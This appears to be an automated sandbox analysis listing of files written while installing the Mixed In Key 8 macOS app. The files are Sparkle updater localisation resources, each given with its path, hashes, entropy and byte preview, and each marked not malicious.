                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_KdALRr
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15724
                                                                                                    Entropy (8bit):6.771316141158126
                                                                                                    Encrypted:false
                                                                                                    MD5:F33C7B6285272192D53B71C3A7DDA823
                                                                                                    SHA1:4F8E24AAA157D0B11E95A6619287FFFEA19B8F41
                                                                                                    SHA-256:0296BE87B80B31F3CF3E78D862EA2D745B98F66997E5A749E8D517E0DAA5D85E
                                                                                                    SHA-512:9B7A52DA1001150B5F2069D1D106873DAB731E10FD728F2FD7CB72FB2053F4459A80A3B553928F87027B1521C2176F6EE32994F7CE22248F8B84C98A93196AF7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_OZxUj9
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12152
                                                                                                    Entropy (8bit):6.728197121245614
                                                                                                    Encrypted:false
                                                                                                    MD5:D70DD1994B4C17387DED7C6EB4449CBC
                                                                                                    SHA1:49BFEFD5FE0253D3B6BC40CD2EA964F1163C811B
                                                                                                    SHA-256:71B0E2F84889E68142859CB3346D765A1D43A7ED48037998DBA149939D0B71E5
                                                                                                    SHA-512:50744103044ACD19401F9A4F2D64ED55C0410C887FECA7557BDFBF4A223DF95812B5D743243122FF4D4BC1E0A8CEAA16B5C7A9BFF6289DC93BD1824AF8D80733
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/es.lproj/.BC.T_w8RA2Q
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7008
                                                                                                    Entropy (8bit):3.4124477771837975
                                                                                                    Encrypted:false
                                                                                                    MD5:7769F661B7648C104BF5877FE261CCBA
                                                                                                    SHA1:1AB35C5B316336ECB7681258EC81BC38BF419C43
                                                                                                    SHA-256:0065DAD391159B78A4E09D2D25E1E220B62AAF8DB6D217FB5339E5D4F722E93B
                                                                                                    SHA-512:8A7BCD2DB241455AA1D13AE26F898448A4641DC1659019099B1EA6306F5F8F20B29E4C252BB75869740F4FAC1C252E246F843B1698318D4FA6EE3C53FE3813CF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .s.e. .h.a.n. .d.e.s.c.a.r.g.a.d.o. .y. .e.s.t...n. .l.i.s.t.o.s. .p.a.r.a. .u.t.i.l.i.z.a.r... ...L.e. .g.u.s.t.a.r...a. .i.n.s.t.a.l.a.r. .e. .i.n.i.c.i.a.r. .%.1.$.@. .a.h.o.r.a.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.o. .s.e. .p.u.e.d.e. .a.c.t.u.a.l.i.z.a.r. .c.u.a.n.d.o. .s.e. .e.j.e.c.u.t.a. .d.e.s.d.e. .u.n. .v.o.l.u.m.e.n. .d.e. .s...l.o. .l.e.c.t.u.r.a. .c.o.m.o. .i.m.a.g.e.n. .d.e. .d.i.s.c.o. .
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_sLsiEd
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18605
                                                                                                    Entropy (8bit):6.772539776074263
                                                                                                    Encrypted:false
                                                                                                    MD5:905B4788B43512FCA30868869BDA16B1
                                                                                                    SHA1:C317D2840C0B660869170D0FC16A6C115418F470
                                                                                                    SHA-256:51D8190829FC0B8A8A988185C069B159C257B73830088E7D86C5E3C35DAC3604
                                                                                                    SHA-512:8AD5AA6AE10DB2D6596B75549F4D264FFE16B38F05B91F19CB9E8EE0949B071C5048087EEDA28537DE813C1EDC584D6545045010ACA6803AA91A11759FD86937
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_tq336A
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15875
                                                                                                    Entropy (8bit):6.793393959352986
                                                                                                    Encrypted:false
                                                                                                    MD5:26E2AC6528980057A0D18C40C9FF9B09
                                                                                                    SHA1:B4D2398A1878F46400D7E770721365CFAA168B76
                                                                                                    SHA-256:B81F0D913793C8BA8CDCDB2328658F07A88DC05B05C39EC590B17C99709B6CC3
                                                                                                    SHA-512:E2F202941D0B037A118BFEE087715414EB9ADC42C8CBC59394FC17303E3328E2127B6735154BE80E77CE17E8FC2929AC07E0CD5FC1604ACD87EF6F5D7A0AD228
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.........b.............................................................$.*.+.,./.2.5.>.?.G.K.L.U.V.].^.b.w.{...........................................................................................................".#.$.*.2.3.4.:.B.C.D.J.Q.R.S.Z.[.\.v.y.z.|.....r.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_wstox4
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7256
                                                                                                    Entropy (8bit):3.4114435509507874
                                                                                                    Encrypted:false
                                                                                                    MD5:24B114811E9088232A4DF847DD29CA1E
                                                                                                    SHA1:E73F1544C42834BC00CB307D332F289814E42990
                                                                                                    SHA-256:F4840DD7634537D348A9774C837E9608546B99700B55B709E95DEDBA009879FD
                                                                                                    SHA-512:1C7A5B3C32D549D2E2BE4544955157BC7F5DE620C29B7C59CDDC78F390367A41A06E22BB6D9ED294665E8A17FF124A972BD518EA79519F41E69D7FF2F021A9AB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .a. ...t... .t...l...c.h.a.r.g..... .V.o.u.l.e.z.-.v.o.u.s. .l.. i.n.s.t.a.l.l.e.r. .e.t. .r.e.l.a.n.c.e.r. .%.1.$.@. .m.a.i.n.t.e.n.a.n.t...?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .n.e. .p.e.u.t. .p.a.s. ...t.r.e. .m.i.s. ... .j.o.u.r. .q.u.a.n.d. .i.l. .f.o.n.c.t.i.o.n.n.e. ... .p.a.r.t.i.r. .d.. u.n. .v.o.l.u.m.e. .e.n. .l.e.c.t.u.r.e. .s.e.u.l.e.,. .c.o.m.m.e. .u.n.e. .i.m.a.g.e. .d.i.s.q.u.e. .o.u. .u.n.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/fr.lproj/.BC.T_xEEyNs
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12176
                                                                                                    Entropy (8bit):6.722479289585943
                                                                                                    Encrypted:false
                                                                                                    MD5:A7A6FA570EF2911C750A1FDD8B5B8271
                                                                                                    SHA1:7EA1590D965C26BB086C447BD2FF9177B1BA417E
                                                                                                    SHA-256:BD54E397C27A31324B5F456B4FDDBEF1146EB536C41E8F6BCE5A18C42E4550F5
                                                                                                    SHA-512:1376E6FB11D7FAD1CAD473AD9C022E3039DF4D6EEA7860A07229B3478C2A794F18FED7B146D5A66F9DE600D09434E50C61245D2B665A227C0602FD9941FD45EA
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_G2sHGu
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text
                                                                                                    Size (bytes):4744
                                                                                                    Entropy (8bit):3.445063830625109
                                                                                                    Encrypted:false
                                                                                                    MD5:38CD8E647C2A853B14765A6BF8B11854
                                                                                                    SHA1:774B05146AB0F627CC9AFAE71E1220BDECCB75F1
                                                                                                    SHA-256:57E1840E60D70F6B41F353F33CA57FCC671C49712EB7061E0EA92B69D2ECD075
                                                                                                    SHA-512:66B05DCA6AC9F95E77D56CD5051B9FC0F9969283F63977FB46A840140D9FB779176DB259B66ED65B957DD0433CD1AE09657DD8C432F52FCB469C5EC17ED879EC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.@. .o.f. .%.@.". .=. .".%.@. .a.f. .%.@.".;.....".%.@. .%.@. .h.a.s. .b.e.e.n. .i.n.s.t.a.l.l.e.d. .a.n.d. .w.i.l.l. .b.e. .r.e.a.d.y. .t.o. .u.s.e. .n.e.x.t. .t.i.m.e. .%.@. .s.t.a.r.t.s.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .r.e.l.a.u.n.c.h. .n.o.w.?.". .=. .".%.@. .%.@. .h.e.f.u.r. .v.e.r.i... .s.e.t.t. .i.n.n. .o.g. .v.e.r...u.r. .t.i.l.t...k.t. .v.i... .n...s.t.u. .r...s.i.n.g.u. .%.@... .V.i.l.t.u. .e.n.d.u.r.r...s.a. .n...n.a.?.".;.....".%.@. .%.@. .i.s. .c.u.r.r.e.n.t.l.y. .t.h.e. .n.e.w.e.s.t. .v.e.r.s.i.o.n. .a.v.a.i.l.a.b.l.e...". .=. .".%.@. .%.@. .e.r. .n...j.a.s.t.a. ...t.g...f.a.n. .s.e.m. .e.r. .f...a.n.l.e.g. ...e.s.s.a. .s.t.u.n.d.i.n.a...".;.....".%.@. .%.@. .i.s. .n.o.w. .a.v.a.i.l.a.b.l.e.-.-.y.o.u. .h.a.v.e. .%.@... .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .d.o.w.n.l.o.a.d. .i.t. .n.o.w.?.". .=. ."...t.g.a.f.a. .%.2.$.@. .a.f. .%.1.$.@. .e.r. .n... .f...a.n.l.e.g.t. .e.n. ..... .e.r.t. .m.e... .%.3.$.@... .V.i.l.t.u. .s...k.j.a. .h.a.n.a. .n...n.a.?.".;.....".%.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_KDNN35
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18529
                                                                                                    Entropy (8bit):6.791448998770888
                                                                                                    Encrypted:false
                                                                                                    MD5:D7D8589AD88DD880A3A7A8818468AE17
                                                                                                    SHA1:DE1308755717FFEDB57498BE54A640EA1B9C2DFE
                                                                                                    SHA-256:4FE5CC29BF48D777DF97CD819E6318B573A5A487D46DA540242E7F497D575F59
                                                                                                    SHA-512:949D799636391C6205C12B4556A4000B75394165769F2D09BE2AC8D7668E98ED0DD005266264A85D327F1B670BAE100517A903499A9F657D236F9BDD606CA1A6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_Piu3zU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12166
                                                                                                    Entropy (8bit):6.7263421646850095
                                                                                                    Encrypted:false
                                                                                                    MD5:1982B7E31804EF31C8C2F331F76B9E28
                                                                                                    SHA1:C176FC753B45AAEF64A8406B086DFE8CC633B907
                                                                                                    SHA-256:89E276242430E37CC94D24FD7E06A5D5AF4DF55718D8BCB57695B02A20A08476
                                                                                                    SHA-512:C0B0EE847A9F6B29B390BA0EACB31C7FF1E2C8A27E3F94C689D3188EE142E0679EB029B0FF8736B20D89BC904E825A0FBE30501735632B4B0A9AE69110A389B2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/is.lproj/.BC.T_mtedky
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15507
                                                                                                    Entropy (8bit):6.795330655052782
                                                                                                    Encrypted:false
                                                                                                    MD5:A32C7152CE2D7604F2C7E549DB3CCB0D
                                                                                                    SHA1:03AF2B5C3AF48A17B45A1F45D8BFE666C187EFE2
                                                                                                    SHA-256:8BBBC7A45C803F3B9ED59B0F5222A5F3A57808EB8AF9C779A28F602BE3E85E4C
                                                                                                    SHA-512:7796DBD148883362309CFD7844464A13077F88E0D74BCF67EB22470A82E9498C264EA515965C28DDC92020F3E9ADF9AE6F5BDD69B962AFA80555F26D02DC74D3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_5yk3ZM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18463
                                                                                                    Entropy (8bit):6.7841741490880905
                                                                                                    Encrypted:false
                                                                                                    MD5:6198B37320379E152D91C6075C408FD6
                                                                                                    SHA1:2370384B3D36E438BE5C5F596689503509367689
                                                                                                    SHA-256:7EF6106E88FA6FC13669692538187A851861A547CE69907C7C737DA9EA2245E9
                                                                                                    SHA-512:896F394BD37626D3A83887DC9552A7CADC3ECE694364CC7540307CF673A80FE7BD24198ACDBFD26FC4BD06987538D5BA4149530424B08E7F8347ADA864E46772
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/it.lproj/.BC.T_iikYkq
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):7188
                                                                                                    Entropy (8bit):3.398526932639579
                                                                                                    Encrypted:false
                                                                                                    MD5:BD82A5C8E76EF154BD73D5DA2982B981
                                                                                                    SHA1:1E87511F6C0DF7CED688BA9FA3D62445C11AD403
                                                                                                    SHA-256:0BC0892A613808E134E57CAE0FBC42A42634D3855F05E12A4C0516E27CA90902
                                                                                                    SHA-512:0C7371F9D1A819507E35FF18B8751168C6C7BCC0A07B4D64EBF579D949328CF17DFB254343AFAB149198621E0BC90A23D8F6C6DAB3D5E3EC7F3F3978E59FBF13
                                                                                                    Malicious:false
                                                                                                    Reputation:low
